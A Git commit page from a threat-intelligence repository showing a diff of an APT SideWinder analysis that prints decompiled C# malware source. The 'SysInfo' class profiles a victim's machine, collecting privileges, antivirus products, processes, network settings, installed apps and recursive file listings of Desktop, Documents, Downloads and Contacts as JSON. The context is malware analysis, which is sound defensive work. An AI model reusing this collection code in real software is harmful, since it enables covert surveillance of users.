ch0ic3/CyberThreatIntel
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update analysis.md

Browse Source
This commit is contained in:
StrangerealIntel 2019-12-28 02:25:08 +01:00 committed by GitHub
parent 55ddc23367
commit b40afa4ea9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 496 additions and 496 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

992
Indian/APT/SideWinder/25-12-19/analysis.md
View File

@ -970,502 +970,502 @@ using Microsoft.Win32;
using Newtonsoft.Json; using Newtonsoft.Json;
namespace SystemApp namespace SystemApp
{ {
// Token: 0x02000005 RID: 5 // Token: 0x02000005 RID: 5
[ComVisible(true)] [ComVisible(true)]
internal class SysInfo internal class SysInfo
{ {
// Token: 0x06000028 RID: 40 // Token: 0x06000028 RID: 40
[DllImport("advapi32.dll", SetLastError = true)] [DllImport("advapi32.dll", SetLastError = true)]
private static extern bool GetTokenInformation(IntPtr tokenHandle, SysInfo.TokenInformationClass tokenInformationClass, IntPtr tokenInformation, int tokenInformationLength, out int returnLength); private static extern bool GetTokenInformation(IntPtr tokenHandle, SysInfo.TokenInformationClass tokenInformationClass, IntPtr tokenInformation, int tokenInformationLength, out int returnLength);
// Token: 0x06000029 RID: 41 // Token: 0x06000029 RID: 41
[DllImport("shell32.dll", CharSet = CharSet.Auto)] [DllImport("shell32.dll", CharSet = CharSet.Auto)]
private static extern int SHGetKnownFolderPath(ref Guid id, int flags, IntPtr token, out IntPtr path); private static extern int SHGetKnownFolderPath(ref Guid id, int flags, IntPtr token, out IntPtr path);
// Token: 0x0600002A RID: 42 RVA: 0x0000353C File Offset: 0x0000173C // Token: 0x0600002A RID: 42 RVA: 0x0000353C File Offset: 0x0000173C
private static void WriteWmi(JsonTextWriter jsonWriter, string queryTable, string scope, string[] columns) private static void WriteWmi(JsonTextWriter jsonWriter, string queryTable, string scope, string[] columns)
{ {
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
try try
{ {
foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher(scope, "SELECT * FROM " + queryTable).Get()) foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher(scope, "SELECT * FROM " + queryTable).Get())
{ {
ManagementObject managementObject = (ManagementObject)managementBaseObject; ManagementObject managementObject = (ManagementObject)managementBaseObject;
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
foreach (string text in columns) foreach (string text in columns)
{ {
jsonWriter.WritePropertyName(text); jsonWriter.WritePropertyName(text);
try try
{ {
if (text != null && text == "ProcessOwner") if (text != null && text == "ProcessOwner")
{ {
string[] array = new string[] string[] array = new string[]
{ {
string.Empty, string.Empty,
string.Empty string.Empty
}; };
ManagementObject managementObject2 = managementObject; ManagementObject managementObject2 = managementObject;
string methodName = "GetOwner"; string methodName = "GetOwner";
object[] args = array; object[] args = array;
if (Convert.ToInt32(managementObject2.InvokeMethod(methodName, args)) == 0){jsonWriter.WriteValue(array[1] + "\\" + array[0]);} if (Convert.ToInt32(managementObject2.InvokeMethod(methodName, args)) == 0){jsonWriter.WriteValue(array[1] + "\\" + array[0]);}
else{jsonWriter.WriteValue("NoOwner");} else{jsonWriter.WriteValue("NoOwner");}
} }
else{jsonWriter.WriteValue(managementObject[text]);} else{jsonWriter.WriteValue(managementObject[text]);}
} }
catch{jsonWriter.WriteValue("nota");} catch{jsonWriter.WriteValue("nota");}
} }
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
} }
catch (Exception ex) catch (Exception ex)
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("error"); jsonWriter.WritePropertyName("error");
jsonWriter.WriteValue(ex.ToString()); jsonWriter.WriteValue(ex.ToString());
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
} }
// Token: 0x0600002B RID: 43 RVA: 0x000036A4 File Offset: 0x000018A4 // Token: 0x0600002B RID: 43 RVA: 0x000036A4 File Offset: 0x000018A4
private static string GetPath(Guid guid) private static string GetPath(Guid guid)
{ {
IntPtr ptr; IntPtr ptr;
if (SysInfo.SHGetKnownFolderPath(ref guid, 0, IntPtr.Zero, out ptr) == 0) if (SysInfo.SHGetKnownFolderPath(ref guid, 0, IntPtr.Zero, out ptr) == 0)
{ {
string result = Marshal.PtrToStringUni(ptr); string result = Marshal.PtrToStringUni(ptr);
Marshal.FreeCoTaskMem(ptr); Marshal.FreeCoTaskMem(ptr);
return result; return result;
} }
return null; return null;
} }
// Token: 0x0600002C RID: 44 RVA: 0x000036D0 File Offset: 0x000018D0 // Token: 0x0600002C RID: 44 RVA: 0x000036D0 File Offset: 0x000018D0
private static void GetAllFiles(string path, List<string> files) private static void GetAllFiles(string path, List<string> files)
{ {
try try
{ {
files.AddRange(Directory.GetFiles(path)); files.AddRange(Directory.GetFiles(path));
string[] directories = Directory.GetDirectories(path); string[] directories = Directory.GetDirectories(path);
for (int i = 0; i < directories.Length; i++){SysInfo.GetAllFiles(directories[i], files);} for (int i = 0; i < directories.Length; i++){SysInfo.GetAllFiles(directories[i], files);}
} }
catch{} catch{}
} }
// Token: 0x0600002D RID: 45 RVA: 0x0000371C File Offset: 0x0000191C // Token: 0x0600002D RID: 45 RVA: 0x0000371C File Offset: 0x0000191C
private static void WritePrivileges(JsonTextWriter jsonWriter) private static void WritePrivileges(JsonTextWriter jsonWriter)
{ {
jsonWriter.WritePropertyName("privileges"); jsonWriter.WritePropertyName("privileges");
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
try try
{ {
bool flag = false; bool flag = false;
bool flag2 = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator); bool flag2 = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
if (flag2){flag = true;} if (flag2){flag = true;}
else if (Environment.OSVersion.Version.Major >= 6) else if (Environment.OSVersion.Version.Major >= 6)
{ {
int num = Marshal.SizeOf(typeof(int)); int num = Marshal.SizeOf(typeof(int));
IntPtr intPtr = Marshal.AllocHGlobal(num); IntPtr intPtr = Marshal.AllocHGlobal(num);
try try
{ {
if (!SysInfo.GetTokenInformation(WindowsIdentity.GetCurrent().Token, SysInfo.TokenInformationClass.TokenElevationType, intPtr, num, out num)) if (!SysInfo.GetTokenInformation(WindowsIdentity.GetCurrent().Token, SysInfo.TokenInformationClass.TokenElevationType, intPtr, num, out num))
{ {
throw Marshal.GetExceptionForHR(Marshal.GetHRForLastWin32Error()); throw Marshal.GetExceptionForHR(Marshal.GetHRForLastWin32Error());
} }
SysInfo.TokenElevationType tokenElevationType = (SysInfo.TokenElevationType)Marshal.ReadInt32(intPtr); SysInfo.TokenElevationType tokenElevationType = (SysInfo.TokenElevationType)Marshal.ReadInt32(intPtr);
if (tokenElevationType != SysInfo.TokenElevationType.TokenElevationTypeDefault && tokenElevationType - SysInfo.TokenElevationType.TokenElevationTypeFull <= 1){flag = true;} if (tokenElevationType != SysInfo.TokenElevationType.TokenElevationTypeDefault && tokenElevationType - SysInfo.TokenElevationType.TokenElevationTypeFull <= 1){flag = true;}
} }
finally{if (intPtr != IntPtr.Zero){Marshal.FreeHGlobal(intPtr);}} finally{if (intPtr != IntPtr.Zero){Marshal.FreeHGlobal(intPtr);}}
} }
jsonWriter.WritePropertyName("IsInAdminGroup"); jsonWriter.WritePropertyName("IsInAdminGroup");
jsonWriter.WriteValue(flag ? "Yes" : "No"); jsonWriter.WriteValue(flag ? "Yes" : "No");
jsonWriter.WritePropertyName("IsAdminPrivilege"); jsonWriter.WritePropertyName("IsAdminPrivilege");
jsonWriter.WriteValue(flag2 ? "Yes" : "No"); jsonWriter.WriteValue(flag2 ? "Yes" : "No");
} }
catch (Exception ex) catch (Exception ex)
{ {
jsonWriter.WritePropertyName("error"); jsonWriter.WritePropertyName("error");
jsonWriter.WriteValue(ex.ToString()); jsonWriter.WriteValue(ex.ToString());
} }
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
// Token: 0x0600002E RID: 46 RVA: 0x00003850 File Offset: 0x00001A50 // Token: 0x0600002E RID: 46 RVA: 0x00003850 File Offset: 0x00001A50
private static void WriteSysInfo(JsonTextWriter jsonWriter) private static void WriteSysInfo(JsonTextWriter jsonWriter)
{ {
jsonWriter.WritePropertyName("sysInfo"); jsonWriter.WritePropertyName("sysInfo");
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("userAccount"); jsonWriter.WritePropertyName("userAccount");
SysInfo.WriteWmi(jsonWriter, "Win32_userAccount", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_userAccount", "root\\cimv2", new string[]
{ {
"name" "name"
}); });
jsonWriter.WritePropertyName("computerSystem"); jsonWriter.WritePropertyName("computerSystem");
SysInfo.WriteWmi(jsonWriter, "Win32_computerSystem", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_computerSystem", "root\\cimv2", new string[]
{ {
"Caption", "Caption",
"UserName", "UserName",
"Manufacturer", "Manufacturer",
"Model", "Model",
"PrimaryOwnerName", "PrimaryOwnerName",
"TotalPhysicalMemory" "TotalPhysicalMemory"
}); });
jsonWriter.WritePropertyName("antiVirusProduct"); jsonWriter.WritePropertyName("antiVirusProduct");
SysInfo.WriteWmi(jsonWriter, "antiVirusProduct", "root\\SecurityCenter2", new string[] SysInfo.WriteWmi(jsonWriter, "antiVirusProduct", "root\\SecurityCenter2", new string[]
{ {
"displayName", "displayName",
"ProductState", "ProductState",
"TimeStamp" "TimeStamp"
}); });
jsonWriter.WritePropertyName("antiSpywareProduct"); jsonWriter.WritePropertyName("antiSpywareProduct");
SysInfo.WriteWmi(jsonWriter, "antiSpywareProduct", "root\\SecurityCenter2", new string[] SysInfo.WriteWmi(jsonWriter, "antiSpywareProduct", "root\\SecurityCenter2", new string[]
{ {
"displayName", "displayName",
"ProductState", "ProductState",
"TimeStamp" "TimeStamp"
}); });
jsonWriter.WritePropertyName("process"); jsonWriter.WritePropertyName("process");
SysInfo.WriteWmi(jsonWriter, "Win32_process", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_process", "root\\cimv2", new string[]
{ {
"Name", "Name",
"CommandLine", "CommandLine",
"ProcessOwner" "ProcessOwner"
}); });
jsonWriter.WritePropertyName("processor"); jsonWriter.WritePropertyName("processor");
SysInfo.WriteWmi(jsonWriter, "Win32_processor", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_processor", "root\\cimv2", new string[]
{ {
"Caption", "Caption",
"Name", "Name",
"Architecture", "Architecture",
"NumberOfCores", "NumberOfCores",
"NumberOfLogicalProcessors", "NumberOfLogicalProcessors",
"ProcessorId", "ProcessorId",
"CurrentClockSpeed", "CurrentClockSpeed",
"MaximumClockSpeed", "MaximumClockSpeed",
"DataWidth" "DataWidth"
}); });
jsonWriter.WritePropertyName("operatingSystem"); jsonWriter.WritePropertyName("operatingSystem");
SysInfo.WriteWmi(jsonWriter, "Win32_operatingSystem", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_operatingSystem", "root\\cimv2", new string[]
{ {
"Caption", "Caption",
"version", "version",
"RegisteredUser", "RegisteredUser",
"BuildNumber", "BuildNumber",
"ServicePackMajorVersion", "ServicePackMajorVersion",
"ServicePackMinorVersion", "ServicePackMinorVersion",
"OSArchitecture", "OSArchitecture",
"OSProductSuite" "OSProductSuite"
}); });
jsonWriter.WritePropertyName("timeZone"); jsonWriter.WritePropertyName("timeZone");
SysInfo.WriteWmi(jsonWriter, "Win32_timeZone", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_timeZone", "root\\cimv2", new string[]
{ {
"Caption", "Caption",
"description", "description",
"StandardName" "StandardName"
}); });
jsonWriter.WritePropertyName("quickFixEngineering"); jsonWriter.WritePropertyName("quickFixEngineering");
SysInfo.WriteWmi(jsonWriter, "Win32_quickFixEngineering", "root\\cimv2", new string[] SysInfo.WriteWmi(jsonWriter, "Win32_quickFixEngineering", "root\\cimv2", new string[]
{ {
"HotFixID", "HotFixID",
"Description", "Description",
"InstalledOn" "InstalledOn"
}); });
jsonWriter.WritePropertyName("network"); jsonWriter.WritePropertyName("network");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
try try
{ {
foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces())
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("name"); jsonWriter.WritePropertyName("name");
jsonWriter.WriteValue(networkInterface.Name); jsonWriter.WriteValue(networkInterface.Name);
jsonWriter.WritePropertyName("description"); jsonWriter.WritePropertyName("description");
jsonWriter.WriteValue(networkInterface.Description); jsonWriter.WriteValue(networkInterface.Description);
jsonWriter.WritePropertyName("networkInterfaceType"); jsonWriter.WritePropertyName("networkInterfaceType");
jsonWriter.WriteValue(networkInterface.NetworkInterfaceType.ToString()); jsonWriter.WriteValue(networkInterface.NetworkInterfaceType.ToString());
jsonWriter.WritePropertyName("operationalStatus"); jsonWriter.WritePropertyName("operationalStatus");
jsonWriter.WriteValue(networkInterface.OperationalStatus.ToString()); jsonWriter.WriteValue(networkInterface.OperationalStatus.ToString());
jsonWriter.WritePropertyName("speed"); jsonWriter.WritePropertyName("speed");
jsonWriter.WriteValue(networkInterface.Speed); jsonWriter.WriteValue(networkInterface.Speed);
jsonWriter.WritePropertyName("macAddress"); jsonWriter.WritePropertyName("macAddress");
jsonWriter.WriteValue(BitConverter.ToString(networkInterface.GetPhysicalAddress().GetAddressBytes())); jsonWriter.WriteValue(BitConverter.ToString(networkInterface.GetPhysicalAddress().GetAddressBytes()));
IPInterfaceProperties ipproperties = networkInterface.GetIPProperties(); IPInterfaceProperties ipproperties = networkInterface.GetIPProperties();
if (networkInterface.Supports(NetworkInterfaceComponent.IPv4)) if (networkInterface.Supports(NetworkInterfaceComponent.IPv4))
{ {
jsonWriter.WritePropertyName("isDhcpEnabled"); jsonWriter.WritePropertyName("isDhcpEnabled");
jsonWriter.WriteValue(ipproperties.GetIPv4Properties().IsDhcpEnabled); jsonWriter.WriteValue(ipproperties.GetIPv4Properties().IsDhcpEnabled);
} }
jsonWriter.WritePropertyName("dhcpServers"); jsonWriter.WritePropertyName("dhcpServers");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
foreach (IPAddress ipaddress in ipproperties.DhcpServerAddresses){jsonWriter.WriteValue(ipaddress.ToString());} foreach (IPAddress ipaddress in ipproperties.DhcpServerAddresses){jsonWriter.WriteValue(ipaddress.ToString());}
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("dnsAddresses"); jsonWriter.WritePropertyName("dnsAddresses");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
foreach (IPAddress ipaddress2 in ipproperties.DnsAddresses){jsonWriter.WriteValue(ipaddress2.ToString());} foreach (IPAddress ipaddress2 in ipproperties.DnsAddresses){jsonWriter.WriteValue(ipaddress2.ToString());}
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("winsAddresses"); jsonWriter.WritePropertyName("winsAddresses");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
foreach (IPAddress ipaddress3 in ipproperties.WinsServersAddresses){jsonWriter.WriteValue(ipaddress3.ToString());} foreach (IPAddress ipaddress3 in ipproperties.WinsServersAddresses){jsonWriter.WriteValue(ipaddress3.ToString());}
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("gatewayAddresses"); jsonWriter.WritePropertyName("gatewayAddresses");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
foreach (GatewayIPAddressInformation gatewayIPAddressInformation in ipproperties.GatewayAddresses){jsonWriter.WriteValue(gatewayIPAddressInformation.Address.ToString());} foreach (GatewayIPAddressInformation gatewayIPAddressInformation in ipproperties.GatewayAddresses){jsonWriter.WriteValue(gatewayIPAddressInformation.Address.ToString());}
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("ipAddresses"); jsonWriter.WritePropertyName("ipAddresses");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
foreach (UnicastIPAddressInformation unicastIPAddressInformation in ipproperties.UnicastAddresses) foreach (UnicastIPAddressInformation unicastIPAddressInformation in ipproperties.UnicastAddresses)
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("address"); jsonWriter.WritePropertyName("address");
jsonWriter.WriteValue(unicastIPAddressInformation.Address.ToString()); jsonWriter.WriteValue(unicastIPAddressInformation.Address.ToString());
AddressFamily addressFamily = unicastIPAddressInformation.Address.AddressFamily; AddressFamily addressFamily = unicastIPAddressInformation.Address.AddressFamily;
if (addressFamily != AddressFamily.InterNetwork) if (addressFamily != AddressFamily.InterNetwork)
{ {
if (addressFamily == AddressFamily.InterNetworkV6) if (addressFamily == AddressFamily.InterNetworkV6)
{ {
jsonWriter.WritePropertyName("prefixOrigin"); jsonWriter.WritePropertyName("prefixOrigin");
jsonWriter.WriteValue(unicastIPAddressInformation.PrefixOrigin.ToString()); jsonWriter.WriteValue(unicastIPAddressInformation.PrefixOrigin.ToString());
} }
} }
else else
{ {
jsonWriter.WritePropertyName("subnetMask"); jsonWriter.WritePropertyName("subnetMask");
jsonWriter.WriteValue(unicastIPAddressInformation.IPv4Mask.ToString()); jsonWriter.WriteValue(unicastIPAddressInformation.IPv4Mask.ToString());
} }
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
} }
catch (Exception ex) catch (Exception ex)
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("error"); jsonWriter.WritePropertyName("error");
jsonWriter.WriteValue(ex.ToString()); jsonWriter.WriteValue(ex.ToString());
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
// Token: 0x0600002F RID: 47 RVA: 0x00003EDC File Offset: 0x000020DC // Token: 0x0600002F RID: 47 RVA: 0x00003EDC File Offset: 0x000020DC
private static void WriteDirectoryListing(JsonTextWriter jsonWriter) private static void WriteDirectoryListing(JsonTextWriter jsonWriter)
{ {
jsonWriter.WritePropertyName("dirList"); jsonWriter.WritePropertyName("dirList");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
try try
{ {
foreach (string text in new List<string> foreach (string text in new List<string>
{ {
SysInfo.GetPath(SysInfo.Desktop), SysInfo.GetPath(SysInfo.Desktop),
SysInfo.GetPath(SysInfo.Documents), SysInfo.GetPath(SysInfo.Documents),
SysInfo.GetPath(SysInfo.Downloads), SysInfo.GetPath(SysInfo.Downloads),
SysInfo.GetPath(SysInfo.Contacts) SysInfo.GetPath(SysInfo.Contacts)
}) })
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName(text); jsonWriter.WritePropertyName(text);
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
if (Directory.Exists(text)) if (Directory.Exists(text))
{ {
List<string> list = new List<string>(); List<string> list = new List<string>();
SysInfo.GetAllFiles(text, list); SysInfo.GetAllFiles(text, list);
foreach (string text2 in list){jsonWriter.WriteValue(text2);} foreach (string text2 in list){jsonWriter.WriteValue(text2);}
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
} }
catch (Exception ex){ catch (Exception ex){
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("error"); jsonWriter.WritePropertyName("error");
jsonWriter.WriteValue(ex.ToString()); jsonWriter.WriteValue(ex.ToString());
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
} }
// Token: 0x06000030 RID: 48 RVA: 0x00004028 File Offset: 0x00002228 // Token: 0x06000030 RID: 48 RVA: 0x00004028 File Offset: 0x00002228
private static void WriteDriveInfo(JsonTextWriter jsonWriter) private static void WriteDriveInfo(JsonTextWriter jsonWriter)
{ {
jsonWriter.WritePropertyName("driveInfo"); jsonWriter.WritePropertyName("driveInfo");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
try try
{ {
foreach (DriveInfo driveInfo in DriveInfo.GetDrives()) foreach (DriveInfo driveInfo in DriveInfo.GetDrives())
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("Path"); jsonWriter.WritePropertyName("Path");
jsonWriter.WriteValue(driveInfo.Name); jsonWriter.WriteValue(driveInfo.Name);
jsonWriter.WritePropertyName("type"); jsonWriter.WritePropertyName("type");
jsonWriter.WriteValue(driveInfo.DriveType.ToString()); jsonWriter.WriteValue(driveInfo.DriveType.ToString());
jsonWriter.WritePropertyName("isReady"); jsonWriter.WritePropertyName("isReady");
jsonWriter.WriteValue(driveInfo.IsReady); jsonWriter.WriteValue(driveInfo.IsReady);
if (driveInfo.IsReady) if (driveInfo.IsReady)
{ {
jsonWriter.WritePropertyName("TotalSize"); jsonWriter.WritePropertyName("TotalSize");
jsonWriter.WriteValue(driveInfo.TotalSize); jsonWriter.WriteValue(driveInfo.TotalSize);
jsonWriter.WritePropertyName("FreeSpace"); jsonWriter.WritePropertyName("FreeSpace");
jsonWriter.WriteValue(driveInfo.TotalFreeSpace); jsonWriter.WriteValue(driveInfo.TotalFreeSpace);
jsonWriter.WritePropertyName("availableFreeSpace"); jsonWriter.WritePropertyName("availableFreeSpace");
jsonWriter.WriteValue(driveInfo.AvailableFreeSpace); jsonWriter.WriteValue(driveInfo.AvailableFreeSpace);
jsonWriter.WritePropertyName("driveFormat"); jsonWriter.WritePropertyName("driveFormat");
jsonWriter.WriteValue(driveInfo.DriveFormat); jsonWriter.WriteValue(driveInfo.DriveFormat);
jsonWriter.WritePropertyName("volumeLabel"); jsonWriter.WritePropertyName("volumeLabel");
jsonWriter.WriteValue(driveInfo.VolumeLabel); jsonWriter.WriteValue(driveInfo.VolumeLabel);
} }
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
} }
catch (Exception ex) catch (Exception ex)
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("error"); jsonWriter.WritePropertyName("error");
jsonWriter.WriteValue(ex.ToString()); jsonWriter.WriteValue(ex.ToString());
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
} }
// Token: 0x06000031 RID: 49 RVA: 0x00004180 File Offset: 0x00002380 // Token: 0x06000031 RID: 49 RVA: 0x00004180 File Offset: 0x00002380
private static void WriteInstalledApps(JsonTextWriter jsonWriter) private static void WriteInstalledApps(JsonTextWriter jsonWriter)
{ {
jsonWriter.WritePropertyName("installedApps"); jsonWriter.WritePropertyName("installedApps");
jsonWriter.WriteStartArray(); jsonWriter.WriteStartArray();
try try
{ {
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall")) using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"))
{ {
foreach (string name in registryKey.GetSubKeyNames()) foreach (string name in registryKey.GetSubKeyNames())
{ {
using (RegistryKey registryKey2 = registryKey.OpenSubKey(name)) using (RegistryKey registryKey2 = registryKey.OpenSubKey(name))
{ {
if (registryKey2 != null) if (registryKey2 != null)
{ {
string text = registryKey2.GetValue("DisplayName") as string; string text = registryKey2.GetValue("DisplayName") as string;
if (text != null) if (text != null)
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("Name"); jsonWriter.WritePropertyName("Name");
jsonWriter.WriteValue(text); jsonWriter.WriteValue(text);
jsonWriter.WritePropertyName("Version"); jsonWriter.WritePropertyName("Version");
jsonWriter.WriteValue(registryKey2.GetValue("DisplayVersion")); jsonWriter.WriteValue(registryKey2.GetValue("DisplayVersion"));
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
} }
} }
} }
} }
} }
catch (Exception ex) catch (Exception ex)
{ {
jsonWriter.WriteStartObject(); jsonWriter.WriteStartObject();
jsonWriter.WritePropertyName("error"); jsonWriter.WritePropertyName("error");
jsonWriter.WriteValue(ex.ToString()); jsonWriter.WriteValue(ex.ToString());
jsonWriter.WriteEndObject(); jsonWriter.WriteEndObject();
} }
jsonWriter.WriteEndArray(); jsonWriter.WriteEndArray();
} }
// Token: 0x06000032 RID: 50 RVA: 0x0000429C File Offset: 0x0000249C // Token: 0x06000032 RID: 50 RVA: 0x0000429C File Offset: 0x0000249C
public static void WriteTo(Stream s) public static void WriteTo(Stream s)
{ {
JsonTextWriter jsonTextWriter = new JsonTextWriter(new StreamWriter(s, Encoding.UTF8)); JsonTextWriter jsonTextWriter = new JsonTextWriter(new StreamWriter(s, Encoding.UTF8));
jsonTextWriter.WriteStartObject(); jsonTextWriter.WriteStartObject();
SysInfo.WritePrivileges(jsonTextWriter); SysInfo.WritePrivileges(jsonTextWriter);
SysInfo.WriteSysInfo(jsonTextWriter); SysInfo.WriteSysInfo(jsonTextWriter);
SysInfo.WriteDirectoryListing(jsonTextWriter); SysInfo.WriteDirectoryListing(jsonTextWriter);
SysInfo.WriteDriveInfo(jsonTextWriter); SysInfo.WriteDriveInfo(jsonTextWriter);
SysInfo.WriteInstalledApps(jsonTextWriter); SysInfo.WriteInstalledApps(jsonTextWriter);
jsonTextWriter.WriteEndObject(); jsonTextWriter.WriteEndObject();
jsonTextWriter.Flush(); jsonTextWriter.Flush();
} }
// Token: 0x04000014 RID: 20 // Token: 0x04000014 RID: 20
private static readonly Guid Contacts = new Guid("{56784854-C6CB-462B-8169-88E350ACB882}"); private static readonly Guid Contacts = new Guid("{56784854-C6CB-462B-8169-88E350ACB882}");
// Token: 0x04000015 RID: 21 // Token: 0x04000015 RID: 21
private static readonly Guid Desktop = new Guid("{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}"); private static readonly Guid Desktop = new Guid("{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}");
// Token: 0x04000016 RID: 22 // Token: 0x04000016 RID: 22
private static readonly Guid Documents = new Guid("{FDD39AD0-238F-46AF-ADB4-6C85480369C7}"); private static readonly Guid Documents = new Guid("{FDD39AD0-238F-46AF-ADB4-6C85480369C7}");
// Token: 0x04000017 RID: 23 // Token: 0x04000017 RID: 23
private static readonly Guid Downloads = new Guid("{374DE290-123F-4565-9164-39C4925E467B}"); private static readonly Guid Downloads = new Guid("{374DE290-123F-4565-9164-39C4925E467B}");
// Token: 0x04000018 RID: 24 // Token: 0x04000018 RID: 24
private static readonly Guid Favorites = new Guid("{1777F761-68AD-4D8A-87BD-30B759FA33DD}"); private static readonly Guid Favorites = new Guid("{1777F761-68AD-4D8A-87BD-30B759FA33DD}");
// Token: 0x04000019 RID: 25 // Token: 0x04000019 RID: 25
private static readonly Guid Links = new Guid("{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}"); private static readonly Guid Links = new Guid("{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}");
// Token: 0x0400001A RID: 26 // Token: 0x0400001A RID: 26
private static readonly Guid Music = new Guid("{4BD8D571-6D19-48D3-BE97-422220080E43}"); private static readonly Guid Music = new Guid("{4BD8D571-6D19-48D3-BE97-422220080E43}");
// Token: 0x0400001B RID: 27 // Token: 0x0400001B RID: 27
private static readonly Guid Pictures = new Guid("{33E28130-4E1E-4676-835A-98395C3BC3BB}"); private static readonly Guid Pictures = new Guid("{33E28130-4E1E-4676-835A-98395C3BC3BB}");
// Token: 0x0400001C RID: 28 // Token: 0x0400001C RID: 28
private static readonly Guid SavedGames = new Guid("{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}"); private static readonly Guid SavedGames = new Guid("{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}");
// Token: 0x0400001D RID: 29 // Token: 0x0400001D RID: 29
private static readonly Guid SavedSearches = new Guid("{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}"); private static readonly Guid SavedSearches = new Guid("{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}");
// Token: 0x0400001E RID: 30 // Token: 0x0400001E RID: 30
private static readonly Guid Videos = new Guid("{18989B1D-99B5-455B-841C-AB7C74E4DDFC}"); private static readonly Guid Videos = new Guid("{18989B1D-99B5-455B-841C-AB7C74E4DDFC}");
// Token: 0x0200000C RID: 12 // Token: 0x0200000C RID: 12
private enum TokenInformationClass private enum TokenInformationClass
{ {
// Token: 0x0400002B RID: 43 // Token: 0x0400002B RID: 43
TokenUser = 1, TokenUser = 1,
// Token: 0x0400002C RID: 44 // Token: 0x0400002C RID: 44
TokenGroups, TokenGroups,
// Token: 0x0400002D RID: 45 // Token: 0x0400002D RID: 45
TokenPrivileges, TokenPrivileges,
// Token: 0x0400002E RID: 46 // Token: 0x0400002E RID: 46
TokenOwner, TokenOwner,
// Token: 0x0400002F RID: 47 // Token: 0x0400002F RID: 47
TokenPrimaryGroup, TokenPrimaryGroup,
